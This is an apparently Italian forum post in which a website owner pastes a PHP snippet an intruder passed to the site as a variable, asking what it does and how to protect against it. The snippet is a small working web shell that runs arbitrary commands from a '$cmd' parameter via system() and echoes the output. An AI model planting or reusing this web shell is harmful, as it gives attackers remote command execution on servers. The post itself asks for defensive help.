Dalle statistiche ho visto che qualcuno è entrato nel mio sito passando come variabile uno script in php così fatto:
Vorrei capire questo furbone cosa ha fatto o cercato di fare.codice:</center><font size="2"><pre> bash-2.05# <? if (isset($chdir)) @chdir($chdir); ob_start(); system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output = ob_get_contents(); ob_end_clean(); $output = str_replace("\n","\nbash-2.05# ",$output); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?> </pre> <? die(); ?>
Qualcuno potrebbe darmi delle delucidazioni e magari che accorgimenti adottare?
Grazie
Rispondi quotando